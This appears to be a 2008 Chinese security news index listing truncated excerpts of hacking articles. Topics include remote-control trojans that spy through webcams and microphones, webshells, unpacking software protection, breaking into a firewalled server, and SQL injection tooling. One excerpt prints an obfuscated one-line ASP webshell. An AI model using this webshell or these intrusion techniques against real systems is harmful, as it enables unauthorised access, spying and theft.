毒霸资讯 / 黑客动态_金山毒霸2009 金山杀毒软件免费下载

RSS订阅 金山毒霸非官方通告:

2008-07-22 07:11:52灰鸽子远程控制偷窥你的私生活
【金山毒霸】后援团声明：不是教大家黑客教程只是让大家了解功能。今天给大家讲一下远程控制的三大窃取隐私功能：屏幕捕获、视频控制、录音设置。屏幕捕捉　　屏幕捕捉类似WINDOWS的远程桌面，可以像看电影一样，欣赏着你在电脑上的一举移动。... [阅读全文]
来源：作者：点击：0评论：0

2008-05-20 06:18:06CGI Hack与Webshell研究资料整理
’id’ 类似’’内的操作和命令执行自己构造　　比如：cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。相关html为后缀的脚本技术，继续深挖中，但是不可质疑的是提交数据查询语句也是一种完美的方法... [阅读全文]
来源：作者：点击：13评论：0

2008-05-16 07:07:19从黑客角度来阐述如何防御应用层攻击(图)
随着网络与信息技术的飞速发展，尤其是在互连网飞速发展的今天，网络已经逐渐改变了人们的生活方式，成了生活中不可缺少的一部分。那么下面我就针对网络黑客如何进行攻击与一些常用的攻击手法进行介绍，只有知道了如何攻击才能有效的进行防御。... [阅读全文]
来源：www.anqn.com作者：点击：19评论：0

2008-05-16 03:35:41Bjfnt v1.3脱壳手记
这几天好像都看见有人问bjfnt 1.2的壳怎么脱,所以写了这篇文章,因为最新的是1.3版,所以我在这里只讲1.3的脱壳,我想1.2应该比1.3简单吧.当然这里有高手无数,只是他们没有时间写点东西出来,我就只有代劳了.... [阅读全文]
来源：作者：点击：10评论：0

2008-05-16 03:25:34黑客高手眼中安全防范的四大利器
注意：local setting文件夹默认是隐藏属性，所以，你必须要让系统显示所有隐藏文件，这点我想大家都应该会。答案是否定的，同样在木马或病毒中加上一小段脚本，就可以远程开关你的摄像头，你在房间的一举一动都能看的清清楚楚。... [阅读全文]
来源：作者：点击：25评论：0

2008-05-15 02:43:11实战Armadillo V3.60标准加壳方式的脱壳
现在， Armadillo3.6的脱壳文章还没有，所以昨晚小妹闲着没事，便用Armadillo V3.60专业版加了记事本的壳（XP）。好，重头再来一次，做法和前面的一样，共按37次F9，　　取消断点，按ctrl+f9，执行到返回。... [阅读全文]
来源：作者：点击：12评论：0

2008-05-15 02:42:25The Armadillo Software Protection System Version2.51 full unpack cracked by zomb
bpx VirtualProtect,在最后一次被中断后，按大约2次f12返回Armadillo领空,按f10带过一个call,在下一个call进入,继续按f10走到call edi处，edi里存放的就是入口地址新版本Armadillo脱壳的一个难点是它的代码段是分页解密的，我估计它的做法是将代码段锁定，即将其属性... [阅读全文]
来源：作者：点击：17评论：0

2008-05-13 02:35:06Armadillo V2_xx标准加壳方式的脱壳--Virtual Personality4.0
确信你已经牢固的理解了PE文件格式,因为那是重建PE映象的基础,并且清楚Armadillo保护的理论和方法。然后按F12辅之以F10跟踪过去一些指令,直到你看到一个"call EDI"指令,停在那儿,然后写下EDI的值.那就是OEP.... [阅读全文]
来源：www.anqn.com作者：点击：20评论：0

2008-05-12 02:32:37一个扩展dir命令的vbs脚本
‘CMD下的dir好像没法列出从某段时间到某段时间的文件，所以写了这个小东东 ” & vbCrLf & “共找到文件:” & FileTotal & “个.” & vbCrLf & “共搜索目录:” & DirTotal & “个.” &vbcrlf&”文件总数大小”&FormatNumber(FileTotalsize/1024,0)&”kB”& vbCrLf & “... [阅读全文]
来源：作者：点击：10评论：0

2008-05-09 01:29:25关于Armadillo 3.7“作品”的几点体会
重新载入这个东东，隐藏od后对WaitForDebugEvent下断，断下后去掉断点再bp GetThreadContext，呵呵，来了：把这里的A5 A8 3C 76按二进制方式copy，去掉9C4913的断点，f9，断在CALL [9CB138]处，这时你可以从hex dump... [阅读全文]
来源：作者：点击：10评论：0

2008-05-08 01:30:31强暴藏在防火墙后面的机子
写了个vbs下载脚本上去,下载了个反弹的马试试,结果不上线(意料中)马是绝对安装成功的.安装端口复用的后门,成功安装,可依然连不上去 ok,修改终端服务端口为80,sc禁用 iisadmin/w3svc/httpfilter 添加管理用户重启服务器　　1分钟不到,终于登上了可爱的终端.... [阅读全文]
来源：作者：点击：23评论：0

2008-05-08 01:25:45Armadillo3.60 CopyMem-ll +Debug-Blocker脱壳
找出OEP，我不多说了，感觉这里面没有捷径，都一样，可以参考我前面的文章作者其它的都可以，一样的。现在我们直接跳到00401000在这里新建EIP，（为什么是这里，自己看吧，呵呵）然后修改如下：... [阅读全文]
来源：作者：点击：7评论：0

2008-05-08 01:22:05爱的初体验之Armadillo2.0加壳的记事本
运行Winhex,选定进程Nopepad.tmp0,编辑内存，位置-转移到偏移量 401000 ,看到这时可不是58等无用代码了,和未加壳的记事本相同位置代码相同。次接触ARM,查阅了几篇文章，这里一一感谢诸位前辈指点，感觉文中有很多不足，还请各位大侠不吝指教。... [阅读全文]
来源：作者：点击：8评论：0

2008-05-07 00:51:53一个Web木马样本获取的简单流程
上午公司服务器也被挂马了，分析了下，顺便将步骤写出来了！共享之，没什么技术含量了，高手可以跳过了！就昨天晚上发现木马做了一个简单的分析，木马路径是：http://www.****.com/ma/web.htm 想办法获取其源码，最好不要用IE浏览器，我是用firefox浏览的，但是看到的... [阅读全文]
来源：作者：点击：13评论：8

2008-05-07 02:25:48自己写的文件分析器-PE DeCODER v1.0
在《软件加密技术》这本书里看过PE文件各部分的详细解释之后，我也有了一个自己写PE文件分析器的的想法。虽然好的分析器不在少数，但对于一堆十六进制数，有些朋友可能不明白它代表什么意思。如果在程序里就可以将这些01序列转换成可以直接看懂得信息，那至少用户可以省... [阅读全文]
来源：作者：点击：8评论：0

2008-05-07 02:27:24木马编程DIY之系统服务
对系统服务的管理几乎是目前的木马必不可少的功能，比如神气儿、上兴远程控制等，都提供了此项服务。要是我们能给自己编写的木马也加上这个功能，看着也不赖哦。好啦，废话不多说，下面开始干活!我们的木马要实现的效果如图1和图2所示。取得配置权限在对服务进行管理... [阅读全文]
来源：作者：点击：8评论：0

2008-05-07 02:28:03批处理打造自己的工具
很久没给大家带来好的东西了。作为批处理区版主，有点失职，先给大家陪个不是了。这篇文章是我在黑手上看到的。其中最出色的地方就是结合了INF文件。这个对我来说是个新概念。! 这个批处理工具有5个功能 1.查询快捷方式所指文件路径 2.系统账号重命名功能 3.重新启动 4... [阅读全文]
来源：作者：点击：16评论：0

2008-05-07 02:28:42用vbs写的短小精悍的字典生成器
’code by lcx ,很好,很强大,很黄很暴力,很傻很天真,很zd很cnn ’这个程序是算不同数字与字母的所有排列组合,当然可以做为字典生成器来用.如需不同组合,只需改本程序a和b的变量即可以. ’use:cscript this.vbs dic.txt a=Array(1,2,3,4,"a") Function js1(n) for i=1 ... [阅读全文]
来源：作者：点击：8评论：0

2008-05-06 00:00:00经典一句话Asp木马加密(去掉asp里的％)
不知道怎样表达清楚。看例子吧： script language=vbs runat=server Execute(HextoStr("65786563757465287265717565737428636872283335292929")) Function HextoStr(data) HextoStr="EXECUTE """"" C="CHR(H" N=")" Do While Len(data)1 If IsNumeric(Left(... [阅读全文]
来源：作者：点击：8评论：0

2008-05-07 02:53:14Sql2005注射辅助脚本[粗糙版]
作者：Tr4c3'***********************************************************************************************'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com '亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。 '**********... [阅读全文]
来源：作者：点击：8评论：12

首页 12 3 4 5 6 7 下一页末页

推荐文章

热门文章

关于我们 - 联系我们 - 广告服务 - 法律声明 - RSS订阅 - 网站地图 - 返回顶部 -